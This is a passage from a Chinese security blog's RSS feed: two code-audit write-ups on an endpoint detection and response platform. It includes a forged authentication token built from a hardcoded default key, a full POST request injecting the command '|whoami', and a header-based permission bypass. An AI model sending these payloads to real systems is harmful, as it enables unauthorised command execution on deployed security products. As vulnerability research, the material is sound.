        if(!isset($query_str_parsed[TOKEN])) {
            throw new Exception(ldb_get_lang(&quot;THIS_OPERATION_NEED_TOKEN&quot;));
        }
        $ret = check_access_token($query_str_parsed[TOKEN], $req_url);
        if ($ret == 1) {
            response_linkage_dev_msg(CSSP_TOKEN_AUTH_FAILED);
            die();
        }
    }
    //判断url 需不需要进行校验token
    if($req_url == AGENT_INFO_URL ||
       $req_url == SCAN_ABOUT_URL ||
       $req_url == EDR_INFO_ABOUT_URL ||
       $req_url == EVIDENCE_INFO_URL){
        //校验token
        $url_params = get_url_param();
        $ret = token_valid($url_params[TOKEN]);
        if($ret){
            response_linkage_dev_msg($ret);
            die();
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;简单理解就是获取所有请求参数，并获取参数 &lt;code&gt;token&lt;/code&gt; 的值带入函数 &lt;code&gt;check_access_token&lt;/code&gt;，最后的返回结果不为 &lt;code&gt;1&lt;/code&gt; 即可成功验证token，我们继续跟进该函数，文件 &lt;code&gt;/bin/web/ui/php/platform.php&lt;/code&gt; :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;/**
 * 检验cssp请求的token
 * @return 0/1 成功/失败
 */
function check_access_token($access_token, $req_url){

    $token_str = base64_decode($access_token);
    $json_token = json_decode($token_str, true);
    $key = get_item_from_os_json(&quot;privateKey&quot;);
    if($key == &quot;&quot; &amp;amp;&amp;amp; $req_url == STD_CSSP_DOWN_CONF_URL) {
        $key = STD_CSSP_DEFAULT_KEY;
    }
    $md5_str = md5($key.$json_token[&quot;random&quot;]);
    if($md5_str == $json_token[&quot;md5&quot;]) {
        return 0;
    }

    ldb_error(&quot;check token failed&quot;);
    return 1;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;参数 &lt;code&gt;token&lt;/code&gt; 的值需要经过Base64解码、JSON转换（ 将JSON转为数组 ），最后字段 &lt;code&gt;random&lt;/code&gt; 与变量 &lt;code&gt;$key&lt;/code&gt; 拼接进行md5加密的值与字段 &lt;code&gt;md5&lt;/code&gt; 一样则可以进入 &lt;code&gt;return 0;&lt;/code&gt; 否则就是 &lt;code&gt;return 1;&lt;/code&gt;（ 我们就需要返回为0才可过token验证 ）。&lt;/p&gt;

&lt;p&gt;那在这我们需要知道变量 &lt;code&gt;$key&lt;/code&gt; 是怎么样获取到的，跟进函数 &lt;code&gt;get_item_from_os_json&lt;/code&gt; :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;/**
 * 从/etc/cssp_custom_image/os.json中获取指定值
 * @param $key os.json中的键
 * @return 返回指定键对应的值
 */
function get_item_from_os_json($key){
    $item = &quot;&quot;;

    $file_path = &quot;/etc/cssp_custom_image/os.json&quot;;
    if(file_exists($file_path)){
        $os_json = get_json_from_file($file_path);
        if ($os_json === null) {
            ldb_error(&quot;target file is null&quot;);
            return &quot;&quot;;
        }
        $item = $os_json[$key];
    }

    return $item;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;发现这里实际意义上就是将 &lt;code&gt;$file_path = &quot;/etc/cssp_custom_image/os.json&quot;;&lt;/code&gt; 带入 &lt;code&gt;get_json_from_file&lt;/code&gt; 函数，继续跟进这个函数 :&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;/**
 * 从文件读取一个json
 * @param conf_file 文件路径+文件名
 * @return data_arry 返回一个关联数组
*/
function get_json_from_file($conf_file){
    if (!file_exists($conf_file)) {
        ldb_error(&quot;err:file null&quot;);
        return null;
    }

    $json_string = file_get_contents($conf_file);
    $data_arry = json_decode($json_string, true);

    if (is_null($data_arry)) {
        ldb_error(&quot;get json from file failed&quot;);
        return null;
    }

    return $data_arry;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;该函数就是从文件中读取JSON，并转为数组返回，我们想要知道具体内容就要看下初始的 &lt;code&gt;/etc/cssp_custom_image/os.json&lt;/code&gt; 文件内容，但笔者这里安装默认情况下该文件是不存在的 :&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15981333535662.jpg&quot; alt=&quot;-w1076&quot; /&gt;&lt;/p&gt;

&lt;p&gt;那在这里其返回的就是空，这时候我们再回到函数 &lt;code&gt;check_access_token&lt;/code&gt;，其代码（ 代码上文中已经列出 ）逻辑当变量 &lt;code&gt;$key&lt;/code&gt; 值为空并且 &lt;code&gt;$req_url == STD_CSSP_DOWN_CONF_URL&lt;/code&gt;（ &lt;code&gt;define(&quot;STD_CSSP_DOWN_CONF_URL&quot;,&quot;/api/edr/sangforinter/v2/cssp/down_conf&quot;);&lt;/code&gt;
 ） 的情况下变量 &lt;code&gt;$key&lt;/code&gt; 值为常量 &lt;code&gt;STD_CSSP_DEFAULT_KEY&lt;/code&gt;  的值，即: &lt;code&gt;define(&quot;STD_CSSP_DEFAULT_KEY&quot;,&quot;amsPnhHqfN5Ld5FU&quot;);&lt;/code&gt;（ 常量定义在 &lt;code&gt;/bin/mapreduce/app/web/device_linkage/common/common.php&lt;/code&gt; 文件中 ）。&lt;/p&gt;

&lt;p&gt;但此处我们的变量 &lt;code&gt;$req_url&lt;/code&gt; 为 &lt;code&gt;/api/edr/sangforinter/v2/cssp/slog_client&lt;/code&gt; 并不符合逻辑条件，所以变量 &lt;code&gt;$key&lt;/code&gt; 还是为空的。&lt;/p&gt;

&lt;p&gt;那我们可以根据代码逻辑直接构建token值，首先是JSON内容有两个字段random、md5，还要满足字段md5的值等于&lt;code&gt;md5(字段random)&lt;/code&gt;的值，所以我们要提前先设置字段random为1，随后进行md5加密并将结果赋予字段md5即可 :&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15981351792870.jpg&quot; alt=&quot;-w374&quot; /&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{&quot;random&quot;:&quot;1&quot;, &quot;md5&quot;:&quot;c4ca4238a0b923820dcc509a6f75849b&quot;}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;最后进行Base64编码 : &lt;code&gt;eyJyYW5kb20iOiIxMjMiLCAibWQ1IjoiYWI0NzU2M2FjNmZiOWU1MTdiZTg4ODBjODdmNzc2NWYifQ==&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;至此我们就绕过了token校验限制。&lt;/p&gt;

&lt;h5 id=&quot;逻辑梳理&quot;&gt;逻辑梳理&lt;/h5&gt;

&lt;p&gt;我们来梳理函数 &lt;code&gt;get_interface_data&lt;/code&gt; 的逻辑，其通过函数 &lt;code&gt;get_opr&lt;/code&gt; 反回值带入函数 &lt;code&gt;get_app_name&lt;/code&gt; 获取具体代码路径，而后当HTTP请求类型为POST时获取请求正文（ POST数据，如下函数 &lt;code&gt;get_body_data&lt;/code&gt;，将请求正文的JSON转为数组 ），通过构建数组将数据填充进去，并返回该数组。（ 简单梳理，具体请看代码 ）&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;/**
 * @fun        根据协议body中的内容来构造data中的内容
 * @param      array     $argv      输入的参数
 * @return     array     $params    联动设备传来的body
 */
function get_body_data($argv){
    $ini_file = getenv(&quot;EPS_INSTALL_ROOT&quot;) . &quot;config/tenant.conf&quot;;
    if(file_exists($ini_file)){
        if (0 != strlen(ldb_post_json())) {
            $docker_data = ldb_get_post($argv);
            return $docker_data;
        }
    }

    $params = array();
    if(0 != strlen(ldb_post_json())) {
        $params = ldb_get_post($argv);
    }
    return $params;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;我们已经知道了函数 &lt;code&gt;get_interface_data&lt;/code&gt; 的逻辑，再跟进调用其的函数 &lt;code&gt;ldb_execute_app&lt;/code&gt; 即可。&lt;/p&gt;

&lt;h4 id=&quot;ldb_execute_app-函数分析&quot;&gt;ldb_execute_app 函数分析&lt;/h4&gt;

&lt;p&gt;阅读过«对某终端检测响应平台&lt;strong&gt;权限绕过&lt;/strong&gt;漏洞的审计流程»该分享的读者，大致就能理解这里函数的作用了：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;/**
 * @func      APP通用入口函数，将联动发来的信息转换成EDR通用的前后端接口
 * @param     array    $args   输入的参数
 */
function ldb_execute_app($args) {
    try {

        //构造成业务统一处理的接口
        $interface_data = get_interface_data($args);
        // 检验请求信息是否包含注入关键字
        $ignore_check = read_ignore_check_info();
        if(mongo_injection_check($interface_data, $ignore_check) === TRUE) 
        {
            response_linkage_dev_die_msg(ldb_get_lang(ARGV_CONTAIN_RISK), RESPONSE_ERROR);
            ldb_error(&quot;request argv contain mongodb risk keyword, argv=&quot; . json_encode($interface_data));
            return ;
        }

        //特殊开权限控制函数
        special_auth($interface_data);
        //授权控制
        authorize_check($interface_data);
        ldb_debug(&quot;interface_data is &quot; . json_encode($interface_data));
        $app = $interface_data[&quot;app_args&quot;][&quot;name&quot;];
        $constructor = ldb_mapreduce_invoke(&quot;get&quot;, $app);
        // 构建应用对象
        $instance = call_user_func($constructor);
        $ret = call_user_func($instance-&amp;gt;main, $instance, $interface_data);
        //响应出错返回相应的状态码
        if ($ret) {
            $err_code = call_user_func($instance-&amp;gt;res, $instance);
            response_linkage_dev_msg($err_code);
        }
        // 销毁应用对象
        call_user_func($instance-&amp;gt;destroy, $instance);
    }
    catch(Exception $e){
        //通知联动设备
        $err_msg = $e-&amp;gt;getMessage();
        response_linkage_dev_die_msg($err_msg, RESPONSE_ERROR);
    }
}

// 入口函数
$args = ldb_argv_get();
ldb_execute_app($args);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;code&gt;ldb_execute_app&lt;/code&gt; 函数传入参数为变量 &lt;code&gt;$args&lt;/code&gt;，该值通过函数 &lt;code&gt;ldb_argv_get&lt;/code&gt; 获取，跟进发现就是获取的 URI 部分。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;/**
 * 获取命令行参数
 * @return array 返回命令行参数
 */
function ldb_argv_get() {
    if (ldb_is_cli()) {
        global $argv;
        return $argv;
    }
    $args = array($_SERVER[&apos;PHP_SELF&apos;]);
    return $args;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;逻辑梳理与漏洞利用&quot;&gt;逻辑梳理与漏洞利用&lt;/h2&gt;

&lt;p&gt;由于之前的步骤都是逆推，这里我们直接顺着推一遍流程就能理清整个思路了。&lt;/p&gt;

&lt;p&gt;假设在此我们访问的是 &lt;code&gt;/api/edr/sangforinter/v2/cssp/slog_client&lt;/code&gt;，那就是其传入函数 &lt;code&gt;get_interface_data&lt;/code&gt;，由于需要过 &lt;code&gt;check_token&lt;/code&gt;，所以访问地址需为 &lt;code&gt;/api/edr/sangforinter/v2/cssp/slog_client?token=eyJyYW5kb20iOiIxIiwgIm1kNSI6ImM0Y2E0MjM4YTBiOTIzODIwZGNjNTA5YTZmNzU4NDliIn0=&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;而后通过函数 &lt;code&gt;get_opr&lt;/code&gt; 得到了 &lt;code&gt;exec_slog_action&lt;/code&gt;，再根据 &lt;code&gt;exec_slog_action&lt;/code&gt; 获得了具体代码路径 &lt;code&gt;app.web.device_linkage.process_cssp&lt;/code&gt;，最后根据 &lt;code&gt;opr&lt;/code&gt;、&lt;code&gt;app_name&lt;/code&gt; 以及 &lt;code&gt;data&lt;/code&gt;（ 这里的data需为POST请求方式时才有 ）构造数组返回，这里测试就是GET请求，最后返回数据为：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;array(2) {
  [&quot;app_args&quot;]=&amp;gt;
  array(1) {
    [&quot;name&quot;]=&amp;gt;
    string(35) &quot;app.web.device_linkage.process_cssp&quot;
  }
  [&quot;opr&quot;]=&amp;gt;
  string(16) &quot;exec_slog_action&quot;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;变量 &lt;code&gt;$interface_data&lt;/code&gt; 获取了函数 &lt;code&gt;get_interface_data&lt;/code&gt; 的返回值，由于&lt;code&gt;ldb_execute_app&lt;/code&gt; 函数代码很多，不过多赘述，有几处授权校验的函数，简单跟踪下看下注释就能了解CSSP请求不处理授权：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15981751022649.jpg&quot; alt=&quot;-w855&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15981750951438.jpg&quot; alt=&quot;-w665&quot; /&gt;&lt;/p&gt;

&lt;p&gt;回调调用 &lt;code&gt;app.web.device_linkage.process_cssp&lt;/code&gt; 的函数 &lt;code&gt;main&lt;/code&gt; 传入变量 &lt;code&gt;$instance&lt;/code&gt;、&lt;code&gt;$interface_data&lt;/code&gt;（ 函数 &lt;code&gt;get_interface_data&lt;/code&gt; 的返回值 ），那我们跟进 &lt;code&gt;main&lt;/code&gt; 函数，又是回调函数调用 &lt;code&gt;exec_slog_action&lt;/code&gt; 并传入变量 &lt;code&gt;$object&lt;/code&gt;、&lt;code&gt;$params&lt;/code&gt; （ 函数 &lt;code&gt;get_interface_data&lt;/code&gt; 的返回值 ）。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15981754820272.jpg&quot; alt=&quot;-w542&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这样无法造成命令执行，我们在之前 &lt;code&gt;exec_slog_action 匿名函数分析&lt;/code&gt; 中了解到其要获取 &lt;code&gt;$params[&apos;data&apos;][&apos;params&apos;]&lt;/code&gt; 带入命令执行语句中，由于我们测试的是GET请求，函数 &lt;code&gt;get_interface_data&lt;/code&gt; 的返回值并没有 &lt;code&gt;data[&apos;params&apos;]&lt;/code&gt; 这个key，而刚好函数 &lt;code&gt;get_interface_data&lt;/code&gt; 中的变量 &lt;code&gt;$interface_data[&quot;data&quot;]&lt;/code&gt; 会获取函数 &lt;code&gt;get_body_data&lt;/code&gt; 处理请求正文的JSON内容转为数组的结果，所以我们修改请求方法为POST，请求正文为：&lt;code&gt;{&quot;params&quot;:&quot;|whoami&quot;}&lt;/code&gt;，即可进行命令注入从而执行。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;// {&quot;params&quot;:&quot;|whoami&quot;}` -&amp;gt; array(&apos;params&apos; =&amp;gt; &apos;|whoami&apos;)
$interface_data[&quot;data&quot;] = array(&apos;params&apos; =&amp;gt; &apos;|whoami&apos;);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15982381570192.jpg&quot; alt=&quot;-w1278&quot; /&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJyYW5kb20iOiIxIiwgIm1kNSI6ImM0Y2E0MjM4YTBiOTIzODIwZGNjNTA5YTZmNzU4NDliIn0= HTTP/1.1
Host: 192.168.31.136
Connection: close
Content-Length: 20
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: https://192.168.31.136
Referer: https://192.168.31.136/ui/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

{&quot;params&quot;:&quot;|whoami&quot;}
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;最后&quot;&gt;最后&lt;/h2&gt;

&lt;p&gt;熟悉了解了整个流程之后，其实还有更多利用点可以挖掘～本文就不过多的赘述了。&lt;/p&gt;
</description>
          <pubDate>2020-09-03T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2020-09-03/4</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2020-09-03/4</guid>
        </item>
      
    
      
        <item>
          <title>某终端检测响应平台代码审计挖掘（权限绕过）</title>
          <description>&lt;h1 id=&quot;某终端检测响应平台代码审计挖掘权限绕过&quot;&gt;某终端检测响应平台代码审计挖掘（权限绕过）&lt;/h1&gt;

&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;前几天收到某终端检测响应平台代码未授权RCE的漏洞情报，基本上被师傅们玩的差不多了，基于其他社群传出的源代码进行代码审计挖掘。&lt;/p&gt;

&lt;p&gt;本文不会对太多细节进行描述，仅做一个流程分析和梳理，文中若有不当之处还望各位师傅斧正。&lt;/p&gt;

&lt;h2 id=&quot;审计流程&quot;&gt;审计流程&lt;/h2&gt;

&lt;p&gt;其源代码的大致目录如下：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;.
├── cascade
├── dbint64_to_array.php
├── dbstr_to_int64.php
├── diskio
├── get_auth.php
├── heart_aware.php
├── kill.exe
├── lang
├── ldb
├── ldb.js
├── ldb_collect.php
├── ldb_daemon.php
├── ldb_manage.php
├── ldb_mapreduce.php
├── ldb_master.php
├── ldb_rest.php
├── ldb_rfs.php
├── ldb_stream.php
├── license
├── link_log_second_convert.php
├── locks
├── manage
├── mapreduce
├── mdb
├── mdb.ini
├── mdb_console.php
├── mdb_server.php
├── misc
├── modify_detect_engine_config.php
├── mongo
├── mongo.exe
├── mongo_config
├── mongod
├── mongodump
├── mongoexport
├── mongoexport.exe
├── mongoimport
├── mongoimport.exe
├── mongorestore
├── netshare.bat
├── patch_upgrade_ipc.php
├── php-fpm-start.sh
├── php-trace
├── phptrace
├── platform
├── start.php
├── start.sh
├── start_mongo.sh
├── start_mongo_for_log.sh
├── sync_execute.php
├── timing_update.php
├── unzip
├── update_virusandavscan.php
├── web
└── zip

&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;其中&lt;code&gt;/web&lt;/code&gt;为Web服务目录，文件均可通过&lt;code&gt;HTTP服务&lt;/code&gt;进行访问，顾我们从该目录下的文件下手审计。&lt;/p&gt;

&lt;h3 id=&quot;ldb_mapreduce_invoke-函数分析&quot;&gt;ldb_mapreduce_invoke 函数分析&lt;/h3&gt;

&lt;p&gt;不是一把梭的0day都不叫0day，寻找能勾起兴趣的文件，发现了它（文件名带有&lt;code&gt;upload&lt;/code&gt;）&lt;code&gt;/bin/web/divideUploader.php&lt;/code&gt;：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;if($_SERVER[&apos;REQUEST_METHOD&apos;]==&quot;POST&quot;){
    //超时开关打开，后台登录时间不刷新
    $update = (isset($_POST[&apos;auto&apos;]) &amp;amp;&amp;amp; $_POST[&apos;auto&apos;] == AUTO_FLASH_SWITCH) ? false : true;
    ldb_mapreduce_invoke(&apos;call_method&apos;,&apos;util.common.auth&apos;, &apos;app_auth_check&apos;, $update);
    ...
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;访问没有做限制，只要HTTP请求类型为&lt;code&gt;POST&lt;/code&gt;就进入上传功能代码逻辑流程，三元运算很简单不用看，我们来看下这段代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;ldb_mapreduce_invoke(&apos;call_method&apos;,&apos;util.common.auth&apos;, &apos;app_auth_check&apos;, $update);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;跟进函数：&lt;code&gt;ldb_mapreduce_invoke&lt;/code&gt;，文件：&lt;code&gt;/bin/mapreduce/core.php&lt;/code&gt;（&lt;em&gt;line 19&lt;/em&gt;）：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;/*
 * 全局的mapreduce对象，提供所有map/reduce工作器件的注册和获取接口
 */
$ldb_mapreduce = (object)array();

/*
 * 调用mapduce接口，变参
 * @return mix 返回调用接口的返回值
 */
function ldb_mapreduce_invoke() {
    global $ldb_mapreduce;
    
    $params = func_get_args();
    if (!count($params)) {  
        return false;
    } //判断参数个数，如果为0则return false;
    $func = $params[0];
    if (!property_exists($ldb_mapreduce, $func)) {
        return false;
    }
    $params[0] = $ldb_mapreduce;
    return call_user_func($ldb_mapreduce-&amp;gt;$func, $params);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;接收自定义参数列表：&lt;code&gt;$params = func_get_args();&lt;/code&gt;（ 该函数以数组形式返回，获取当前函数的所有传入参数值 ），在这就是&lt;code&gt;array(&apos;call_method&apos;,&apos;util.common.auth&apos;, &apos;app_auth_check&apos;, $update)&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;赋值（ &lt;code&gt;$params[0] = &apos;call_method&apos;&lt;/code&gt; ） &lt;code&gt;$func&lt;/code&gt;，检查 &lt;code&gt;$func&lt;/code&gt; 属性是否存在于指定的类（ &lt;code&gt;$ldb_mapreduce&lt;/code&gt; ）中：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$func = $params[0];
if (!property_exists($ldb_mapreduce, $func)) {
    return false;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;最后&lt;code&gt;call_user_func&lt;/code&gt;函数回调，调用&lt;code&gt;$ldb_mapreduce-&amp;gt;call_method&lt;/code&gt;方法，继续跟进此方法（ &lt;em&gt;line 239&lt;/em&gt; ）：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$ldb_mapreduce-&amp;gt;call_method = function ($params) {
    if (count($params) &amp;lt; 3) {
        return false;
    }
    $object = array_shift($params);
    $id     = array_shift($params);
    $method = array_shift($params);
    $object = call_user_func($object-&amp;gt;get, array($object, $id));
    if (!is_object($object) 
        || !property_exists($object, $method)
        || !is_callable($object-&amp;gt;$method)) {
        return false;
    }
    return call_user_func_array($object-&amp;gt;$method, $params);
};
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;简单理解，这是一个匿名函数，形参 &lt;code&gt;$params&lt;/code&gt;（ 在这里也就表示&lt;code&gt;array($ldb_mapreduce, &apos;util.common.auth&apos;, &apos;app_auth_check&apos;, $update)&lt;/code&gt; ），判断 &lt;code&gt;$params&lt;/code&gt; 数组长度是否小于&lt;code&gt;3&lt;/code&gt;，在这里明显不小于，所以继续跟进赋值变量，其一一对应内容为：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$object = array_shift($params); // -&amp;gt; $ldb_mapreduce
$id     = array_shift($params); // -&amp;gt; util.common.auth
$method = array_shift($params); // -&amp;gt; app_auth_check
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;赋值完成之后进入回调函数：&lt;code&gt;$object = call_user_func($object-&amp;gt;get, array($object, $id));&lt;/code&gt;，调用&lt;code&gt;$ldb_mapreduce-&amp;gt;get&lt;/code&gt;传入&lt;code&gt;array($object, $id))&lt;/code&gt;，接下来继续跟进&lt;code&gt;$ldb_mapreduce-&amp;gt;get&lt;/code&gt;：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;/*
 * 获取组件
 * @param array $params 参数数组，array(对象, 名称)
 * @return callable 返回组件构造器，如果没有构造器返回null
 */
$ldb_mapreduce-&amp;gt;get = function ($params) use(&amp;amp;$store_root) {
//ldb_info(&quot;get params: &quot;.json_encode($params));
    list($object, $id) = $params;
    if (!strstr($id, &quot;@&quot;)) {
        $id = &quot;$id@ldb&quot;;
    }
    $fields = preg_split(&quot;/[\.\\\\\\/]+/&quot;, $id);
    if (!count($fields)) {
        return null;
    }
    $component = $fields[0];
    //ldb_info(&quot;$component&quot;);
    $id = implode(&quot;/&quot;, $fields);
    list($path, $base) = explode(&quot;@&quot;, $id);
    if (!property_exists($object, $component) 
        || !array_key_exists($id, $object-&amp;gt;$component)) {
        if ($base == &quot;ldb&quot;) {
            $php = dirname(__FILE__).&quot;/$path.php&quot;;
        } else {
            $php = &quot;$store_root/$base/bin/$path.php&quot;;
        }
        if (!file_exists($php)) {
            return null;
        }
        if (!class_exists(&quot;Error&quot;)) {
            require_once($php);    
        } else {
            try {
                require_once($php);
            } catch (Error $e) {
                ldb_die($e);
            }
        }
    //ldb_info(&quot;id: &quot;.$id.&quot;,component: &quot;.$object-&amp;gt;$component);
        if (!array_key_exists($id, $object-&amp;gt;$component)) {
            ldb_info(&quot;! array_key_exists&quot;);
            return null;
        }
    }
    $components = $object-&amp;gt;$component;
    return $components[$id];
};
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;由于代码过长，很多可以直接在本地调试输出，大概解释下这里的意思，就是将&lt;code&gt;$id = &apos;util.common.auth&apos;;&lt;/code&gt;处理变成路径&lt;code&gt;$php = dirname(__FILE__).&quot;/$path.php&quot;;&lt;/code&gt;，结果就是&lt;code&gt;/bin/mapreduce/util/common/auth.php&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15979094220269.jpg&quot; alt=&quot;-w1170&quot; /&gt;&lt;/p&gt;

&lt;p&gt;接着&lt;strong&gt;require_once（ 包含 ）&lt;/strong&gt;这个文件，最后将&lt;code&gt;auth.php&lt;/code&gt;文件公开的注册接口返回：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2020-09-03/15979127711439.jpg&quot; alt=&quot;-w712&quot; /&gt;&lt;/p&gt;

&lt;p&gt;至此，我们对&lt;code&gt;ldb_mapreduce_invoke&lt;/code&gt;函数的分析就差不多了，最后又是一个&lt;code&gt;call_user_func&lt;/code&gt;回调函数调用&lt;code&gt;auth.php&lt;/code&gt;接口&lt;code&gt;app_auth_check&lt;/code&gt;：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;return call_user_func_array($func, $params);
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;app_auth_check-函数分析&quot;&gt;app_auth_check 函数分析&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;app_auth_check&lt;/code&gt;函数就是检测当前是否具备访问接口权限下，代码如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$app_auth_check = function ($update=true) use(&amp;amp;$login_authed_check,
                                        &amp;amp;$sess_keyvalue_get,
                                        &amp;amp;$timeout_check,
                                        &amp;amp;$dc_session_destroy,
                                        &amp;amp;$login_redirect,
                                        &amp;amp;$super_ip_check){
    // 自动化放开权限检查
    if (ldb_auto_check()) {
        return true;
    }
    // 如果是后台调用app，则不进行权限检查
    if (ldb_is_cli()) {
        return true;
    }
    //如果是通过特权IP登陆，则不需要进行权限检查
    $is_super_ip = call_user_func($super_ip_check);
    if($is_super_ip){
        return true;
    }

    call_user_func($timeout_check, $update);

    // 检测是否登录
    $login = call_user_func($login_authed_check);
    if ($login == false) {
        call_user_func($login_redirect);
        return false;
    }
    // 进行控制台登陆超时检测
    /*
    // app权限检测
    $user_auth_info = call_user_func($sess_keyvalue_get, &quot;auth_page_info&quot;);
    // 检查授权
    if (isset($user_auth_info[&quot;$page_id&quot;][&quot;auth&quot;])) {
        $auth = $user_auth_info[&quot;$page_id&quot;][&quot;auth&quot;];
        if ($auth === true) {
            return true;
        }
    }
    return false;
    */
    return true;
};
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;逐个逻辑跟进分析即可，最后发现特权IP登陆的判断有问题：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$is_super_ip = call_user_func($super_ip_check);
    if($is_super_ip){
        return true;
    }
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;跟进函数&lt;code&gt;super_ip_check&lt;/code&gt;，发现这里获取的了HTTP请求头（&lt;code&gt;$_SERVER[&quot;HTTP_Y_FORWARDED_FOR&quot;] = Y-Forwarded-For&lt;/code&gt;）与&lt;code&gt;$super_ip&lt;/code&gt;进行判断：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$super_ip_check = function() use(&amp;amp;$get_super_ip, &amp;amp;$super_user_check){
    $super_ip = call_user_func($get_super_ip);
    $user_addr = $_SERVER[&quot;HTTP_Y_FORWARDED_FOR&quot;];
    if($user_addr == $super_ip){
        return true;
    }
    else{
        return call_user_func($super_user_check);
    }
};
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;阅读以上代码知道&lt;code&gt;$super_ip&lt;/code&gt;是通过回调函数调用&lt;code&gt;get_super_ip&lt;/code&gt;的结果，这里还需要再跟进&lt;code&gt;get_super_ip&lt;/code&gt;函数：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;$get_super_ip = function(){
    $super_ip_config = ldb_ext_root().&quot;../../dc/config/cssp_super_ip.ini&quot;;
    $super_ip = &quot;&quot;;
    if(file_exists($super_ip_config)){
        $super_config_data = parse_ini_file($super_ip_config, true);
        $super_ip = isset($super_config_data[&quot;config&quot;][&quot;super_ip&quot;]) ? $super_config_data[&quot;config&quot;][&quot;super_ip&quot;] : &quot;&quot;;
    }
    
    return $super_ip;
};
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;在这段代码中我们得知其需要获取&lt;code&gt;cssp_super_ip.ini&lt;/code&gt;文件的内容赋值变量&lt;code&gt;$super_ip&lt;/code&gt;再进行&lt;code&gt;return $super_ip&lt;/code&gt;，但默认环境下该文件不存在的，也就是说变量&lt;code&gt;$super_ip&lt;/code&gt;默认就是空的。&lt;/p&gt;

&lt;p&gt;那么我们只需要满足&lt;code&gt;$user_addr == $super_ip&lt;/code&gt;这个条件，即可绕过这个函数（权限）检测，简而言之就是请求接口时带有请求头&lt;code&gt;Y-Forwarded-For:&lt;/code&gt;即可。&lt;/p&gt;

&lt;h2 id=&quot;漏洞利用&quot;&gt;漏洞利用&lt;/h2&gt;

&lt;p&gt;继续跟进&lt;code&gt;divideUploader.php&lt;/code&gt;发现没办法直接利用（限制了上传路径和后缀）：&lt;/p&gt;

